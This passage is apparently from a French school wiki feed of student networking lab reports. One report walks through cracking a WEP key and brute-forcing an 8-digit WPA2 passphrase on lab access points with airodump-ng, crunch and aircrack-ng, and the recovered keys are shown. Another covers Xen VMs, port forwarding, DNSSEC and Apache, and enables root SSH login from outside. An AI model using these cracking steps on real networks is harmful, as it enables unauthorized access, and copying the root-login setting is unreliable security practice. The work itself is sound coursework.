Pour trouver l'adresse MAC de cracotte10, nous pouvons utiliser &amp;lt;code&amp;gt;airodump-ng&amp;lt;/code&amp;gt;. Pour ce faire, nous devons tout d'abord trouver le '''nom de la carte réseau'''. On peut trouver cela via &amp;lt;code&amp;gt;ip link&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
J'obtiens alors &amp;lt;code&amp;gt;wlan0&amp;lt;/code&amp;gt;, mais pour augmenter la vitesse de cassage, nous utiliserons une clé USB Wi-Pi qui nous attribuera le &amp;lt;code&amp;gt;wlx40a5efd2140c&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on scanne grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid cracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:59  -69        2        1    0   4   54e. WEP  WEP         cracotte10              &lt;br /&gt;
&lt;br /&gt;
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de cracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;04:DA:D2:9C:50:59&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Récupération de données ====&lt;br /&gt;
Une fois '''l'adresse mac et le canal récupérés''', nous pouvons récupérer un flux de données qui sera stocké dans un fichier &amp;lt;code&amp;gt;.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:59 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WEP ====&lt;br /&gt;
Pendant que le fichier se remplit, on peut vérifier régulièrement si la clef a été trouvée.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -b 04:DA:D2:9C:50:58 *.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si le programme réussit, nous '''obtenons la clef !'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;KEY FOUND!   [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Désormais, nous voulons la clef WPA-PSK. Nous savons que cette clef est composée de 8 chiffres. Ainsi, la méthode sera de tester toutes les combinaisons possibles.&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de kracotte10 ====&lt;br /&gt;
Nous obtenons l'adresse MAC grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid kracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09  -67        4        0    0  13   54e. WPA2 CCMP   PSK  kracotte10              &lt;br /&gt;
&lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de kracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;44:AD:D9:5F:87:09&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Dictionnaire ====&lt;br /&gt;
Pour casser le mot de passe par force brute, il nous faut toutes les combinaisons possibles. Le paquetage &amp;lt;code&amp;gt;crunch&amp;lt;/code&amp;gt; est l'outil parfait dans notre cas.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons générer toutes ces combinaisons dans un fichier texte en faisant :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;crunch 8 8 0123456789 -o 8numbers_dico.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Handshake ====&lt;br /&gt;
Maintenant que nous avons l'adresse MAC et le dictionnaire, il nous faut un handshake, nous pouvons faire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:09 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WPA-PSK ====&lt;br /&gt;
Une fois avoir attendu quelques minutes, il suffit de lancer la commande suivante:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -w 8numbers_dico.txt -b 44:AD:D9:5F:87:09 dump-01.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette commande va tester toutes les lignes du fichier texte. Dans notre cas, comme il y a 10 000 000 de possiblités, il faudra attendre une trentaine de minutes avant de trouver la clef.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
	                               Aircrack-ng 1.7&lt;br /&gt;
&lt;br /&gt;
      [00:31:37] 66625424/100000000 keys tested (34611.27 k/s)&lt;br /&gt;
&lt;br /&gt;
      Time left: 16 minutes, 4 seconds                          66.63%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66680666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 67 BB 05 71 A9 6D E4 5C 11 65 42 F7 BD 81 F1 7E&lt;br /&gt;
                       CD 69 8F FE F3 CD 2A 64 9D F1 74 7B 4D F0 CA 65&lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 45 9C CA 1B 45 A8 DA C5 1A 82 BF F5 C4 FF AF 01&lt;br /&gt;
                       FE CD F8 A4 21 38 1A 58 BB C5 DE BA 00 5B BF 2A&lt;br /&gt;
                       03 66 AF 4B 36 A8 B8 C4 B4 30 62 BB 30 73 DA 00&lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00&lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 48 08 73 07 B7 6C 9C FA 3A F1 58 DD 49 93 4C 3E&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Sécurisation et accès WiFi par WPA2-EAP ==&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12362</id>
		<title>Atelier SysRes SE4 2025/2026 E10</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12362"/>
		<updated>2026-02-23T14:01:43Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : /* SSH depuis l'extérieur */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Informations utiles ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+&lt;br /&gt;
!Machine&lt;br /&gt;
!Nom&lt;br /&gt;
!Site web&lt;br /&gt;
!IPv4 publique&lt;br /&gt;
|-&lt;br /&gt;
|Ma machine de service&lt;br /&gt;
|TomPere2&lt;br /&gt;
|tompere2.xyz&lt;br /&gt;
|''NA''&lt;br /&gt;
|-&lt;br /&gt;
|Machine de service d'Aurèle&lt;br /&gt;
|TomPere1&lt;br /&gt;
|tompere.online&lt;br /&gt;
|''NA''&lt;br /&gt;
|-&lt;br /&gt;
|Machine mandataire&lt;br /&gt;
|TomPere0&lt;br /&gt;
|''NA''&lt;br /&gt;
|193.48.57.168&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
=== Créer ses  VMs ===&lt;br /&gt;
&lt;br /&gt;
==== Prérequis ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous devons nous connecter à ''CapBreton'' pour pouvoir y créer nos machines virtuelles.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
ssh root@capbreton&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ensuite, nous utiliserons l'hyperviseur de machine virtuelle Xen pour créer nos VMs.&lt;br /&gt;
&lt;br /&gt;
==== Création ====&lt;br /&gt;
&lt;br /&gt;
Voici la commande permettant de créer ma machine de service. A noter que l'on était initialiement sur la distribution Excalibur, mais nous avons finalement changé pour Daedalus.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
xen-create-image --hostname=SE4-TomPere2 --dhcp --bridge=pont_pere --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2048M --force&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Maintenant que nous avons une machine virtuelle créer, il faut la démarrer et s'y connecter ! C'est ce que permettent les deux commandes suivantes :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
xen create /etc/xen/SE4-TomPere2.cfg&lt;br /&gt;
xen console SE4-TomPere2&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Vérification ====&lt;br /&gt;
Remarque : On peut vérifier que '''les machines virtuelles en cours d’exécution''' grâce à &amp;lt;code&amp;gt;xen list&amp;lt;/code&amp;gt; .&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
root@capbreton:/var# xen list | grep Tom&lt;br /&gt;
SE4-Tompere1                               389  2048     1     -b----    3574.5&lt;br /&gt;
SE4-Tompere2                               390  2048     1     -b----    3343.2&lt;br /&gt;
SE4-Tompere0                               399  2048     1     -b----    8849.0&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Comme on le voit,  nos 3 machines sont démarrées !&lt;br /&gt;
&lt;br /&gt;
=== Partionnage ===&lt;br /&gt;
&lt;br /&gt;
==== Configuration ====&lt;br /&gt;
On ajoute dans le fichier &amp;lt;code&amp;gt;/etc/xen/SE4-Tompere2.cfg&amp;lt;/code&amp;gt; nos partitions '''home''' et '''var'''.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
    root        = '/dev/xvda2 ro'&lt;br /&gt;
    disk        = [&lt;br /&gt;
                    'file:/usr/local/xen/domains/SE4-Tompere2/disk.img,xvda2,w',&lt;br /&gt;
                    'file:/usr/local/xen/domains/SE4-Tompere2/swap.img,xvda1,w',&lt;br /&gt;
                    'phy:/dev/virtual/Tompere2-home,xvda3,w',&lt;br /&gt;
                    'phy:/dev/virtual/Tompere2-var,xvdb1,w',&lt;br /&gt;
                ]&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Montage des partitions ====&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
mkfs -t ext4 /dev/xvdb1&lt;br /&gt;
mount /dev/xvdb1 /mnt&lt;br /&gt;
mv /var/* /mnt&lt;br /&gt;
umount /mnt&lt;br /&gt;
mount -a&lt;br /&gt;
mkfs -t ext4 /dev/xvda3&lt;br /&gt;
mount -a&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Le montage des partitions est fait ! On peut par ailleurs le voir via &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;. Cependant, au redémarrage de la VM, les partitions ne seront pas automatiquement montées. Ainsi, il faut modifier le fichier &amp;lt;code&amp;gt;/etc/fstab&amp;lt;/code&amp;gt;:&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
proc            /proc           proc    defaults        0       0&lt;br /&gt;
devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
/dev/xvda1 none swap sw 0 0&lt;br /&gt;
/dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
/dev/xvda3 /var ext4 defaults 0 2&lt;br /&gt;
/dev/xvdb1 /home ext4 defaults 0 2&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Désormais, nos partitions '''var''' et '''home''' seront bien montés comme il se doit au démarrage.&lt;br /&gt;
&lt;br /&gt;
== Configuration réseau ==&lt;br /&gt;
Ajouter une configuration réseau à nos machines virtuelles est essentiel pour accéder à Internet et pour pouvoir utiliser SSH sur nos machines depuis l'extérieur. C'est ce que nous allons voir dans cette partie.&lt;br /&gt;
&lt;br /&gt;
=== Ping entre les deux machines de services ===&lt;br /&gt;
Comme premier jalon, intéressons nous à la façon de relier nos machines de services.&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, nous avons d'abord modifier les fichiers &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Sur ma machine de services TomPere2 :&amp;lt;syntaxhighlight lang=&amp;quot;vim&amp;quot;&amp;gt;&lt;br /&gt;
auto eth0&lt;br /&gt;
	iface eth0 inet static&lt;br /&gt;
		address 192.168.0.3&lt;br /&gt;
		netmask 255.255.255.0&lt;br /&gt;
		gateway 192.168.0.1&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;et sur la machine mandataire TomPere0 :&amp;lt;syntaxhighlight lang=&amp;quot;vim&amp;quot;&amp;gt;&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.0.1&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
auto eth1&lt;br /&gt;
iface eth1 inet static&lt;br /&gt;
    address 193.48.57.168&lt;br /&gt;
    netmask 255.255.255.224&lt;br /&gt;
    gateway 193.48.57.162&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Après un &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; puis &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt; pour charger les modifications apportées, cette configuration nous a permis de voir l'adresse IPV4 correspondante à &amp;lt;code&amp;gt;eth0&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;ip address&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
De ce fait, nous avons pu '''ping''' d'une machine à l'autre via le commutateur virtuel.&lt;br /&gt;
&lt;br /&gt;
==== Résultat ====&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+IPs de TomPere1&lt;br /&gt;
!TomPere1&lt;br /&gt;
!IPs&lt;br /&gt;
|-&lt;br /&gt;
|IPv4&lt;br /&gt;
|192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
|IPv6&lt;br /&gt;
|2001:660:4401:60a0:216:3eff:fe4b:1909&lt;br /&gt;
|}&lt;br /&gt;
Nous pouvons voir dans le tableau ci-dessus les '''IPs de la machine de service TomPere1''', ce qui nous permettra de '''tester la connexion avec l'utilitaire ping'''.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
root@SE4-Tompere2:~# ping 192.168.0.2&lt;br /&gt;
PING 192.168.0.2 (192.168.0.2) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 192.168.0.2: icmp_seq=1 ttl=64 time=0.236 ms&lt;br /&gt;
64 bytes from 192.168.0.2: icmp_seq=2 ttl=64 time=0.459 ms&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
root@SE4-Tompere2:~# ping 2001:660:4401:60a0:216:3eff:fe4b:1909&lt;br /&gt;
PING 2001:660:4401:60a0:216:3eff:fe4b:1909 (2001:660:4401:60a0:216:3eff:fe4b:1909) 56 data bytes&lt;br /&gt;
64 bytes from 2001:660:4401:60a0:216:3eff:fe4b:1909: icmp_seq=1 ttl=64 time=0.293 ms&lt;br /&gt;
64 bytes from 2001:660:4401:60a0:216:3eff:fe4b:1909: icmp_seq=2 ttl=64 time=0.249 ms&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;TomPere 2 reçoit bien une réponse !&lt;br /&gt;
&lt;br /&gt;
=== SSH depuis l'extérieur ===&lt;br /&gt;
Pour pouvoir se SSH depuis l'extérieur, il faut commencer par activer l'option sur les machines.&lt;br /&gt;
&lt;br /&gt;
Pour cela, rien de plus simple, il faut aller dans le fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; des VMs et activer la directive &amp;lt;code&amp;gt;PermitRootLogin&amp;lt;/code&amp;gt;.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Désormais, l'accès de root à distance est autorisé. On peut donc se '''ssh de TomPere2 vers TomPere1 et inversement''' !&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
root@SE4-Tompere2:~# ssh root@2001:660:4401:60a0:216:3eff:fe4b:1909&lt;br /&gt;
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;C'est pratique, mais ce n'est pas encore ce que l'on veut.&lt;br /&gt;
&lt;br /&gt;
Nous voulons pouvoir se SSH depuis l'extérieur. L'idée va être de dire à la machine mandataire de rediriger certains ports que l'on choisit, vers les machines de services.&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, nous appliquerons la redirection suivante :&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+&lt;br /&gt;
!Nom de la VM&lt;br /&gt;
!Port de redirection associé&lt;br /&gt;
|-&lt;br /&gt;
|TomPere1&lt;br /&gt;
|2201&lt;br /&gt;
|-&lt;br /&gt;
|TomPere2&lt;br /&gt;
|2202&lt;br /&gt;
|}&lt;br /&gt;
Dans le fichier &amp;lt;code&amp;gt;/etc/sysctl.conf&amp;lt;/code&amp;gt;:&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
net.ipv4.ip_forward=1&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Création des chaînes :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
nft add chain PREROUTING&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Redirection des ports :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
nft add rule NAT PREROUTING tcp dport 2201 dnat to 192.168.0.2:22&lt;br /&gt;
nft add rule NAT PREROUTING tcp dport 2202 dnat to 192.168.0.3:22&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Grâce à cette configuration nous pouvons nous connecter sur les machines de services en SSH depuis l'extérieur, via les commandes suivantes :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
ssh root@193.48.57.168 -p2201&lt;br /&gt;
ssh root@193.48.57.168 -p2202&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== DNS/DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
=== Prérequis ===&lt;br /&gt;
Nous devons configurer un serveur DNS, qui associe '''tompere.online''' et '''tompere2.xyz''', aux machines de services.&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, nous avons commencé par louer ces noms de domaine. sur Gandi.&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons pu télécharger les clés qui seront utiles plus tard pour configurer le DNSSEC.&lt;br /&gt;
&lt;br /&gt;
* '''.key''' : la clé privée du domaine&lt;br /&gt;
&lt;br /&gt;
* '''.csr''' : la demande de signature du certificat&lt;br /&gt;
&lt;br /&gt;
=== Configuration du paquetage bind9 ===&lt;br /&gt;
Il faut installer le paquetage &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; avec &amp;lt;code&amp;gt;apt&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Ensuite, il faut configurer un fichier de zone : &amp;lt;code&amp;gt;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;lt;/code&amp;gt;.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    $TTL 400&lt;br /&gt;
    ; Zone file for tompere.online&lt;br /&gt;
    @ IN SOA ns.tompere2.xyz. postmaster.tompere2.xyz. (&lt;br /&gt;
        3703        ; Serial&lt;br /&gt;
        21600       ; Refresh (6h)&lt;br /&gt;
        3600        ; Retry (1h)&lt;br /&gt;
        2592000     ; Expire (30 days)&lt;br /&gt;
        86400       ; Negative cache (24h)&lt;br /&gt;
        )&lt;br /&gt;
&lt;br /&gt;
    ; Name servers&lt;br /&gt;
    @ IN NS ns.tompere2.xyz.&lt;br /&gt;
    @ IN NS ns.tompere.online.&lt;br /&gt;
&lt;br /&gt;
    ; AAAA records (IPv6)&lt;br /&gt;
    @   IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
    ns IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
&lt;br /&gt;
    ; A records (IPv4)&lt;br /&gt;
    ns IN A 193.48.57.168&lt;br /&gt;
    @   IN A 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
    ; CNAME records&lt;br /&gt;
    www IN CNAME tompere2.xyz.&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous avons choisi '''ns''' comme préfixe à nos noms de domaine. Il faut veiller à bien rester cohérent en remplissant la section '''External Nameservers''' de Gandi.&lt;br /&gt;
&lt;br /&gt;
Concernant l'adresse '''IPv4''', &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt; est l'adresse publique de la machine mandataire, ce qui est logique car elle doit être accessible depuis l'extérieur.&lt;br /&gt;
&lt;br /&gt;
Par ailleurs, il faut bien penser à ajouter les '''permissions aux dossiers parents''' de ce fichier de zone. Sinon, des logs ''&amp;quot;Permission Denied&amp;quot;'' apparaîtront, et le DNS sera non fonctionnel.&lt;br /&gt;
&lt;br /&gt;
La syntaxe de ce fichier doit être précise, alors il est pratique de vérifier la validité du fichier via l'utilitaire &amp;lt;code&amp;gt;named-checkzone&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Aussi, pour s'assurer que les mises à jour du fichier sont prises en compte, il faut toujours modifier le numéro de série, par exemple en l'incrémentant de 1.&lt;br /&gt;
&lt;br /&gt;
Maintenant, modifions le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    zone &amp;quot;tompere2.xyz&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;quot;;&lt;br /&gt;
        allow-transfer { secondaries; };  // Filtrage des secondaires&lt;br /&gt;
        also-notify { hiddensecondaries; };&lt;br /&gt;
&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    acl &amp;quot;secondaries&amp;quot; {&lt;br /&gt;
        192.168.0.2;   // Serveur secondaire IPv4&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe4b:1909; // Serveur secondaire IPv6&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    masters &amp;quot;hiddensecondaries&amp;quot; {&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    zone &amp;quot;tompere.online&amp;quot;{&lt;br /&gt;
        type secondary;&lt;br /&gt;
        file &amp;quot;/etc/bind/backup/tompere&amp;quot;;&lt;br /&gt;
        primaries{ 2001:660:4401:60a0:216:3eff:fe4b:1909; };&lt;br /&gt;
    };&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier gère qui est maître ou secondaire pour chaque domaine, où est le fichier de zone, et quels serveurs sont autorisés à recevoir ou notifier les mises à jour.&lt;br /&gt;
&lt;br /&gt;
=== Glue Record ===&lt;br /&gt;
Pour que le domaine soit accessible depuis Internet, j’ai ajouté un '''Glue Record''' sur '''Gandi'''. &lt;br /&gt;
&lt;br /&gt;
Cela permet d’associer l’adresse '''IPv4''' de la machine mandataire et l’adresse '''IPv6''' de ma machine de services aux serveurs de noms du domaine.&lt;br /&gt;
&lt;br /&gt;
* ns.tompere2.xyz&lt;br /&gt;
** IPv4 : &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt;&lt;br /&gt;
** IPv6 : &amp;lt;code&amp;gt;2001:660:4401:60a0:216:3eff:fe3f:9410&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
Pour sécuriser le DNS et avoir un site en HTTPS, nous devons apporter quelques modifications au fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En effet, nous allons rajouter ces lignes dans &amp;lt;code&amp;gt;zone &amp;quot;tompere2.xyz&amp;quot;&amp;lt;/code&amp;gt; &lt;br /&gt;
&lt;br /&gt;
De plus, il faut ajouter&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {&lt;br /&gt;
    keys {&lt;br /&gt;
        ksk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
        zsk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
    };&lt;br /&gt;
    nsec3param;&lt;br /&gt;
};&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ces lignes servent à définir une '''politique de signature'''. Cela indique quelles clés utiliser (KSK/ZSK), leur durée de vie et l’algorithme de signature.&lt;br /&gt;
&lt;br /&gt;
Les clés vont être créer automatiquement au redémarrage de bind, mais il faut pour cela créer un dossier &amp;lt;code&amp;gt;/bind/keys&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
mkdir /etc/bind/keys&lt;br /&gt;
chown bind:bind /etc/bind/keys&lt;br /&gt;
chmod 750 /etc/bind/keys&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin, nous pouvons redémarrer bind pour vérifier la création des clés.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
systemctl restart named&lt;br /&gt;
systemctl enable named&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Les clés sont biens générées !&lt;br /&gt;
&lt;br /&gt;
Il faut désormais '''copier la clé publique''' (.key) sur '''Gandi'''.&lt;br /&gt;
&lt;br /&gt;
Dans mon cas, j'avais 2 clés publiques .key, donc j'ai copié ces deux clés sur Gandi, mais comme nous allons voir, une seule est utile.&lt;br /&gt;
&lt;br /&gt;
Pour mieux visualiser le déploiement de notre DNS, nous pouvons utiliser deux sites bien utiles :&lt;br /&gt;
*https://dnschecker.org/&lt;br /&gt;
*https://dnsviz.net/&lt;br /&gt;
&lt;br /&gt;
&amp;lt;small&amp;gt;Remarque : Nous avons également utilisé &amp;lt;code&amp;gt;dig&amp;lt;/code&amp;gt; pour nos tests intermédiaires.&amp;lt;/small&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le premier site, DNSChecker, nous informe si la propagation de notre DNS a eu lieu.&lt;br /&gt;
&lt;br /&gt;
Dans le cas de '''tompere2.xyz''', on voit que c'est bon, aussi bien en IPv4 qu'en IPv6.&lt;br /&gt;
[[Fichier:Déploiement IPv4.png|néant|vignette|800x800px|Le DNS a bien été déployé partout dans le monde !]]&lt;br /&gt;
[[Fichier:Déploiement DNS IPv6.png|néant|vignette|800x800px|Le DNS a bien été déployé partout dans le monde !]]&lt;br /&gt;
Le DNS marche bien ! Super !&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant s'assurer que la partie sécurisée, fonctionne également.&lt;br /&gt;
&lt;br /&gt;
Rendons nous sur '''DNSViz''', un outil qui nous donnera plus d'informations à ce sujet.&lt;br /&gt;
[[Fichier:DNS Viz.png|néant|vignette|Le DNSSEC fonctionne !]]&lt;br /&gt;
Comme on le vois, le DNSSEC fonctionne ! Cela dit, une clé est inutilisée, comme indiqué sur le schéma en gris clair. Nous pouvons la supprimer de '''Gandi,''' pour rendre l'architecture plus cohérente.&lt;br /&gt;
&lt;br /&gt;
== Serveur Apache ==&lt;br /&gt;
Notre DNSSEC est désormais fonctionnel, on peut alors passer à la configuration d'une page web via &amp;lt;code&amp;gt;apache2&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
=== Objectif ===&lt;br /&gt;
L'objectif du serveur Apache sera de pouvoir servir les pages webs de nos machines de services.&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation du paquet ====&lt;br /&gt;
&amp;lt;code&amp;gt;apt update&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;apt install apache2&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Paramètrage sur machine mandataire ====&lt;br /&gt;
